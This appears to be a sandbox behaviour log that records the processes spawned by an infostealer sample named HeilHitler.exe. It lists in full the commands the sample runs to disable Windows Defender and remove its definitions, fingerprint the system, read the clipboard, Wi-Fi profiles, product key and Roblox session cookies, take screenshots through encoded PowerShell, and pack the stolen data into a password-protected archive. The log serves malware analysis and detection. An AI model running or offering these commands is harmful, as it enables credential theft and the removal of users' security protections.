              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: libffi-7.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: libssl-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
